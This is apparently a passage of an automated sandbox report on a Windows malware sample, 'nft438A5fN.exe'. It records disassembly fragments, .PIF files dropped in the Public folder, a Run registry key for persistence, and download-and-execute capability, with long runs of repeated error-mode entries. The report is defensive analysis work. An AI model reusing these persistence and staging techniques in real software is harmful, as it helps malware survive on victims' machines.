Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02CA2F60 push 02CA2FD6h; ret	0_2_02CA2FCE
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02CBD2FC push 02CBD367h; ret	0_2_02CBD35F
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02C9332C push eax; ret	0_2_02C93368
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02CBD0AC push 02CBD125h; ret	0_2_02CBD11D
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02CA306B push 02CA30B9h; ret	0_2_02CA30B1
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02CA306C push 02CA30B9h; ret	0_2_02CA30B1
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02D6F038 push eax; ret	0_2_02D6F056
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02CBD1F8 push 02CBD288h; ret	0_2_02CBD280
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02CBD144 push 02CBD1ECh; ret	0_2_02CBD1E4
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02CAF108 push ecx; mov dword ptr [esp], edx	0_2_02CAF10D
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02C9D5A0 push 02C9D5CCh; ret	0_2_02C9D5C4
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02CA790C push 02CA7989h; ret	0_2_02CA7981

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\alpha.pif	Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\xpha.pif	Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\Libraries\Wuqtggvo.PIF	Jump to dropped file

Contains functionality to download and launch executables

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 11_2_03206EEB ShellExecuteW,URLDownloadToFileW,

11_2_03206EEB

Drops PE files

Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\alpha.pif	Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\xpha.pif	Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\Libraries\Wuqtggvo.PIF	Jump to dropped file

Drops PE files to the user directory

Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\alpha.pif			Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\xpha.pif			Jump to dropped file

Boot Survival

Drops PE files to the user root directory

Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\alpha.pif			Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\xpha.pif			Jump to dropped file

Source: C:\Windows\SysWOW64\colorcpl.exe

11_2_0321AB9E

Source: C:\Users\user\Desktop\nft438A5fN.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Wuqtggvo			Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Wuqtggvo			Jump to behavior

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\user\Desktop\nft438A5fN.exe

0_2_02CAAB1C

Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
